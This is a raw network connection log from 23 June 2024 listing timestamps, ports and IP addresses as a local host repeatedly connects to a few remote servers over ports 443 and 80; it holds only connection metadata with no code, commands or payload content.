Jun 23, 2024 06:54:15.157426119 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.157455921 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.157602072 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.515945911 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.516305923 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.516402006 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.527344942 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.527380943 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.527407885 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.527426004 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.534301043 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.534393072 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.534466982 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.534926891 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.534965038 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.029215097 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.029303074 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.031089067 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.031115055 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.031470060 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.034159899 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.034193993 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.034380913 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420289040 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420542002 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420617104 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.420630932 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420684099 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420798063 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.420841932 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.420866013 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.421125889 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.421180964 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.421202898 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.421246052 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.421278954 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.424935102 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.424998999 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.425014973 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.474235058 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.474262953 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512130022 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512192965 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.512211084 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512336969 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512408018 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.512422085 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512634039 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512693882 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.512778997 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.512815952 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.512841940 CEST	49732	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.512857914 CEST	443	49732	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.610955000 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.611035109 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:16.611114025 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.611465931 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:16.611495972 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.076904058 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.076998949 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.078191996 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.078239918 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.078913927 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.080024958 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.080153942 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.080203056 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.080277920 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.080296040 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.556827068 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.557106972 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.557185888 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.565381050 CEST	49734	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.565426111 CEST	443	49734	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.596690893 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.596740961 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:17.596842051 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.597115040 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:17.597147942 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.089224100 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.089313984 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.090490103 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.090523958 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.090962887 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.092207909 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.092349052 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.092392921 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.499428988 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.499653101 CEST	443	49737	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.499655962 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.499730110 CEST	49737	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.577605963 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.577718019 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:18.577811956 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.578111887 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:18.578150034 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.044030905 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.044145107 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.047749996 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.047785044 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.048785925 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.057571888 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.058806896 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.058887959 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.059344053 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.059381008 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.216623068 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:19.221714020 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:19.221801043 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:19.222657919 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:19.227704048 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:19.579304934 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.579545021 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.579570055 CEST	443	49739	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.579745054 CEST	49739	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.657296896 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.657381058 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:19.658006907 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.658636093 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:19.658674002 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.024810076 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.067733049 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.069186926 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.074172020 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.107420921 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.107511997 CEST	443	49744	34.117.186.192	192.168.2.4
Jun 23, 2024 06:54:20.107592106 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.113661051 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.113707066 CEST	443	49744	34.117.186.192	192.168.2.4
Jun 23, 2024 06:54:20.129497051 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.129570961 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.130820036 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.130836010 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.131320953 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.132364035 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.132468939 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.132550001 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.290112019 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.290936947 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.295794010 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.300120115 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.312726974 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.317629099 CEST	80	49745	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.318001986 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.318283081 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.323132992 CEST	80	49745	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.323249102 CEST	80	49745	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.339663029 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.340529919 CEST	443	49744	34.117.186.192	192.168.2.4
Jun 23, 2024 06:54:20.344558001 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.514467001 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.567735910 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.576558113 CEST	443	49744	34.117.186.192	192.168.2.4
Jun 23, 2024 06:54:20.576679945 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.576680899 CEST	49744	443	192.168.2.4	34.117.186.192
Jun 23, 2024 06:54:20.645796061 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.646226883 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:20.651170969 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.651184082 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.651197910 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.777740002 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.777985096 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.778075933 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.778515100 CEST	49742	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.778533936 CEST	443	49742	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.795030117 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.795082092 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.795236111 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.795577049 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:20.795615911 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:20.868113995 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:20.908993006 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:21.035774946 CEST	80	49745	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:21.083381891 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:21.269752979 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.269841909 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:21.271564007 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:21.271589994 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.271809101 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.300019026 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:21.301141024 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:21.301163912 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.667088032 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.667290926 CEST	443	49746	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:21.667330027 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:21.667401075 CEST	49746	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.007576942 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.007678986 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.007774115 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.008142948 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.008173943 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.053505898 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.053618908 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.055941105 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.058720112 CEST	80	49741	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:22.058770895 CEST	49741	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.059151888 CEST	80	49745	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:22.059231997 CEST	49745	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.060748100 CEST	80	49748	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:22.060822964 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.060933113 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:22.065689087 CEST	80	49748	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:22.484831095 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.484947920 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.487092018 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.487128973 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.487466097 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.489322901 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490068913 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490114927 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.490232944 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490273952 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.490438938 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490494967 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.490653992 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490722895 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.490900040 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.490969896 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.491194963 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491230965 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.491249084 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491270065 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.491437912 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491473913 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.491518974 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491537094 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491619110 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.491652966 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.500437975 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.500662088 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.500724077 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.500731945 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.500787973 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.500792980 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.500864983 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.500885963 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:22.501005888 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:22.750040054 CEST	80	49748	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:22.802099943 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:24.322251081 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.322360039 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.322415113 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.354579926 CEST	49747	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.354603052 CEST	443	49747	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.444437027 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.444503069 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.444597006 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.445207119 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.445225000 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.910725117 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.910825014 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.931005955 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.931035995 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.931966066 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:24.935410023 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.935435057 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:24.935580969 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:25.604468107 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:25.604716063 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:25.604892969 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:25.630508900 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:25.630531073 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:25.630542040 CEST	49749	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:25.630548954 CEST	443	49749	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:26.060307026 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.065112114 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.065615892 CEST	80	49748	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.065704107 CEST	49748	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.070035934 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.070123911 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.072940111 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.077781916 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.077896118 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.761868000 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.973993063 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:26.974541903 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:26.974600077 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.771322012 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.772042036 CEST	49751	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.776428938 CEST	80	49750	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:31.776531935 CEST	49750	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.776947975 CEST	80	49751	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:31.777036905 CEST	49751	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.777179003 CEST	49751	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:31.781991959 CEST	80	49751	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:31.782125950 CEST	80	49751	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:32.470726013 CEST	80	49751	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:32.471009016 CEST	49751	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:32.476167917 CEST	80	49751	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:32.476227045 CEST	49751	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:37.475193977 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:37.480215073 CEST	80	49752	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:37.480307102 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:37.480432987 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:37.485219002 CEST	80	49752	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:37.485402107 CEST	80	49752	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:38.176522970 CEST	80	49752	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:38.224004984 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.193176985 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.193900108 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.198443890 CEST	80	49752	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:43.198749065 CEST	80	49753	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:43.198813915 CEST	49752	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.198832035 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.198962927 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:43.203792095 CEST	80	49753	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:43.203860044 CEST	80	49753	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:43.926820993 CEST	80	49753	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:43.974040985 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.068387032 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.069164991 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.074333906 CEST	80	49753	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:45.074405909 CEST	49753	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.074518919 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:45.074697018 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.074774027 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.079632998 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:45.786645889 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:45.792171955 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:45.797192097 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.008459091 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.008867979 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.013856888 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013876915 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013890982 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013917923 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013925076 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.013932943 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013946056 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013950109 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.013959885 CEST	80	49754	92.53.96.121	192.168.2.4
Jun 23, 2024 06:54:46.013979912 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.013999939 CEST	49754	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:54:46.014005899 CEST	80	49754	92.53.96.121	192.168.2.4
